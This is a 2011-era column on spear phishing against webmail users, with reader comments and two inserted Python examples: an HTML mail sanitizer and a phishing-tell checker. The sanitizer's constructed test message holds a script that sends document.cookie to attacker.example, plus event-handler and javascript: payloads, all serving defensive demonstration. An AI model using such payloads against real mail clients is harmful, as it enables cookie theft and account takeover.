Ask the Techie: 'Spear Phishing' Attacks on Gmail, Yahoo! Mail and Hotmail

From government officials to your colleagues at work, spear phishing uses social engineering to target email accounts

Breaking news this week told us of government officials being targets of so-called "spear phishing" attacks on their Gmail accounts.  The attacks were traced back to Chinese internet addresses and may have led to the disclosure of significant amounts of government and personal data. 

The attacks were described as spear phishing as they targeted particular groups of people using email language designed to gain trust or look legitimate.  This is in contrast to the typical phishing attack where the bait is more general in nature, say "we have an important message from your bank, please log in here and confirm the transaction."

We are all becoming more savvy about phishing emails.  If you get a message saying it is from your bank, you will probably be a little suspicious and, hopefully, log in by typing the bank's Web address yourself instead of following the link in the message.  Spear phishing is harder to spot because the message appears to come from a friend or co-worker and uses the kind of language you would expect in a normal exchange with that person.

The Guardian newspaper quotes the text of one of the emails sent to senior government officials:

One example of a spear phishing email had the title "Fw: Draft US-China Joint Statement" and contained the text: "This is the latest version of State's joint statement. My understanding is that State put in placeholder econ language and am happy to have us fill in but in their rush to get a cleared version from the WH, they sent the attached to Mike."

If the user followed the link, the attacker would try to capture their password and then either take over the account or quietly read the mail going forward.  Google notified the affected users and helped secure the accounts, but it appears that a significant amount of information was compromised.

Phishing is a form of "social engineering."  That means the attack is not just computer code aimed at your computer; it is someone trying to trick you into compromising your own privacy.  Con games have been used for centuries; this is simply a con that gets you to hand over electronic keys or private information instead of cash or property.

There is also news that similar attacks were launched against several large businesses and against Hotmail and Yahoo! Mail users.  TrendLabs explained in a threat report that the Web-based mail services themselves were targeted: the attackers exploited vulnerabilities in those services to get at passwords without any action by the user.  In the Hotmail case, merely previewing the message was enough; no link had to be clicked.
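The article gives no details of the Hotmail flaw, but the class of bug is well understood: a webmail client renders HTML written by the attacker, and if a script, an event handler or a javascript: link survives into the preview pane it runs in the reader's session as soon as the message is opened. The following added example (not the article's code, and not a description of the actual Hotmail vulnerability) shows the defence a webmail service needs before rendering a message: an allowlist sanitizer that drops script content, strips event-handler attributes, rejects non-http(s) URLs, and, when asked, blocks remote images so that no request leaves the client on preview (the "block external content" setting the comments below recommend). The allowlist, the sample message and the attacker.example host are assumptions constructed for the example.

```python
"""Sanitize attacker-controlled HTML before a webmail client renders it.

Added example, not the original article's code and not the actual Hotmail
flaw.  ALLOWED_TAGS / ALLOWED_ATTRS are an assumed allowlist for illustration.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "blockquote", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# Tags whose *content* must also disappear, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


class MailSanitizer(HTMLParser):
    """Rebuild the message from an allowlist; everything else is discarded."""

    def __init__(self, block_remote=True):
        super().__init__()
        self.out = []
        self.block_remote = block_remote
        self.blocked_remote = 0      # remote images we refused to fetch
        self._skip_depth = 0         # >0 while inside script/style/etc.

    def _safe_url(self, tag, value):
        # Browsers ignore whitespace/control characters inside a scheme, so
        # "java\tscript:" is still javascript:; normalise before checking.
        compact = "".join(ch for ch in value if not ch.isspace() and ord(ch) > 31)
        head = compact.split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
        scheme = head.split(":", 1)[0].lower() if ":" in head else ""
        if scheme and scheme not in ("http", "https", "mailto"):
            return None              # javascript:, data:, vbscript:, ...
        if tag == "img" and self.block_remote and scheme in ("http", "https"):
            self.blocked_remote += 1
            return None              # no tracking pixel fetched on preview
        return compact

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                   # unknown tag dropped, its text is kept
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue             # strips onerror=, onmouseover=, style=, ...
            if name in ("href", "src"):
                value = self._safe_url(tag, value or "")
                if value is None:
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        slash = " /" if tag in VOID_TAGS else ""
        self.out.append(f"<{tag}{''.join(kept)}{slash}>")

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize_html_mail(html, block_remote=True):
    """Return (clean_html, number_of_remote_images_blocked)."""
    s = MailSanitizer(block_remote)
    s.feed(html)
    s.close()
    return "".join(s.out), s.blocked_remote


# Constructed sample message (not a real phish): a preview-time payload.
SAMPLE_HTML = (
    '<p onmouseover="alert(document.cookie)">Draft <b>US-China</b> statement</p>'
    '<script>fetch("http://attacker.example/?c=" + document.cookie)</script>'
    '<img src="http://attacker.example/track.gif" onerror="alert(1)">'
    '<a href="javascript:alert(1)">open</a> '
    '<a href="http://attacker.example/login">State doc</a>'
)

if __name__ == "__main__":
    clean, blocked = sanitize_html_mail(SAMPLE_HTML)
    print(clean)
    print("remote images blocked:", blocked)
```

Running it leaves only `<p>Draft <b>US-China</b> statement</p><img /><a>open</a> <a href="http://attacker.example/login">State doc</a>` and reports one blocked image: the script, the event handlers and the javascript: link are gone, and nothing is fetched from attacker.example just by opening the message. The surviving http link is still a phishing link, which is why link inspection (below) and user caution remain necessary; sanitizing only removes the no-click attack path.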

The attacks are getting more sophisticated, and the bad guys are adapting to the defenses put up to protect users.  There are still things you can do to outsmart a phisher or spear phisher.  The best defense is to read suspiciously.  Even in our region, where we are used to jargon, acronyms and stilted bureaucratic speech, the paragraph quoted above looks "phishy."

Look again at the quoted text above.  It reads as if someone spliced phrases from a couple of memos, which may well be what happened.  Or they may have run text through a tool like Google Translate to approximate "Inside-the-Beltway" English.  Whatever tools were used, it doesn't sound right.  If you get an email that looks "off," don't take it at face value.  Send a separate email to "Mike" (a new message typed to his known address, not a reply, since a reply goes wherever the sender chose) asking whether he is working on a joint statement for State, or pick up the phone and ask the same.

You should also follow basic security steps: keep your software updated and have anti-virus software installed and up to date.  If you get an email like this at work, have your IT department take a look at it.  If you do take the bait and click a malicious link, become suspicious the moment the page asks for your password or other private information.  Close your browser, run a virus scan, and watch for anything unusual on your computer.  If your password has been disclosed to a third party, change it, and change it on any other site where you used the same password, but first make sure your computer has been scanned and any malware removed, or the new password may be captured as well.
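The checks above (the real target of a link versus what it appears to be, and whether a message really comes from who it claims) are mechanical enough to script. The following is an added example, not the article's code, of inspecting a raw message for those tells: it parses a constructed sample modelled on the quoted "Fw: Draft US-China Joint Statement" email (the addresses and the state-gov.example / mail-state-gov.example domains are made up for the example), flags anchors whose visible text names one site while the href goes to another, and flags Reply-To and Return-Path domains that disagree with the From domain. The two-label domain comparison is an assumed simplification; a production check would use a public-suffix list.

```python
"""Flag common phishing tells in a raw RFC 822 message.

Added example (not part of the original article).  The sample below is
constructed for illustration; every address and domain in it is made up.
"""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: looks like an internal forward, links somewhere else.
SAMPLE_EML = """\
From: "Mike Ross" <mike.ross@state-gov.example>
Reply-To: mike.ross@mail-state-gov.example
Return-Path: <bounce@mail-state-gov.example>
To: official@example.org
Subject: Fw: Draft US-China Joint Statement
Content-Type: text/html; charset="utf-8"

<html><body>
<p>This is the latest version of State's joint statement.</p>
<p>Please review: <a href="http://mail-state-gov.example/login">https://docs.google.com/document/d/draft</a></p>
<p>Thanks, <a href="mailto:mike.ross@state-gov.example">Mike</a></p>
</body></html>
"""


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Last two labels of a hostname (assumed simplification, no suffix list)."""
    if not host:
        return ""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def addr_domain(header_value):
    """Registered domain of the address in a From/Reply-To/Return-Path header."""
    if not header_value:
        return ""
    _, addr = parseaddr(str(header_value))
    return registered_domain(addr.rpartition("@")[2])


def find_link_mismatches(html):
    """Return (shown_text, real_href) pairs whose domains disagree."""
    p = LinkExtractor()
    p.feed(html)
    findings = []
    for href, text in p.links:
        target = urlparse(href)
        if target.scheme not in ("http", "https"):
            continue                       # mailto: is not a navigation target
        if not text.startswith(("http://", "https://")):
            continue                       # plain words: nothing to compare
        shown = urlparse(text)
        if registered_domain(shown.hostname) != registered_domain(target.hostname):
            findings.append((text, href))
    return findings


def inspect_message(raw):
    """Return a list of warnings for a raw message string."""
    msg = email.message_from_string(raw, policy=policy.default)
    warnings = []
    from_dom = addr_domain(msg["From"])
    for hdr in ("Reply-To", "Return-Path"):
        other = addr_domain(msg[hdr])
        if other and other != from_dom:
            warnings.append(f"{hdr} domain {other!r} differs from From domain {from_dom!r}")
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        for text, href in find_link_mismatches(body.get_content()):
            warnings.append(f"link shows {text!r} but goes to {href!r}")
    return warnings


if __name__ == "__main__":
    for w in inspect_message(SAMPLE_EML):
        print("WARNING:", w)
```

On the sample it reports three warnings: the Reply-To and Return-Path domains differ from the From domain, and the link that displays a docs.google.com address actually points at mail-state-gov.example. Neither check proves a message is malicious on its own (mailing lists and marketing senders legitimately set a different Return-Path), which is why the article's advice to confirm with "Mike" out of band still applies.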

carl drott June 05, 2011 at 09:37 PM
First, set your email client to display only text messages (not HTML). This makes it much easier to see the true address of any links. (99.9% of HTML in emails adds nothing except pretty.) Set your client not to open any remote files, including graphics. Learn a little about reading the email headers (hey, if you want to drive, you have to learn the rules; if you want to email, learn the rules). If your employer allows email attachments, then you are working for a bunch of jerks! Put files on a secure internal server.
Jean Westcott June 06, 2011 at 12:48 AM
More good advice Carl.
Dick Kennedy June 06, 2011 at 06:36 PM
Excellent advice--thanks Jean and Carl. FYI, old-fashioned phishing is still alive and well--I just got a "security alert" from "Bank of America" that looked very legitimate except that it wanted me to input my credit card number. And if you don't want to spend money on an anti-virus program, Consumer Reports recently rated Avira Antivir as good as any of the commercial programs.
Sally Spangler June 09, 2011 at 03:14 PM
Being a user rather than a techie, your comment needs to be brought down to user-people level. "Email client to display only text messages": client = ? Text messages, I understand. No graphics, yes, I understand. The ones pictured directly in the email itself rather than must be opened, then what? Reading email headers? The true sender email address, yes? Maybe, Carl, you should have the blog on your subject? Thanks for the heads up.
Jean Westcott June 09, 2011 at 03:24 PM
Sally, your email client is the email program you use. If you are using Outlook, go to Tools, click Options, and then choose the Security tab. Click the box that says "Block images and other external content in HTML email." If you aren't using Outlook, you should be able to find a similar setting that causes the non-text portions of emails to be blocked. You will still have the option of downloading the pictures, but the default will be to not display them. If you have a trusted sender that sends HTML email, you can add them to your safe senders list, and then you won't be asked each time to OK images from that sender. Hope this helps, Jean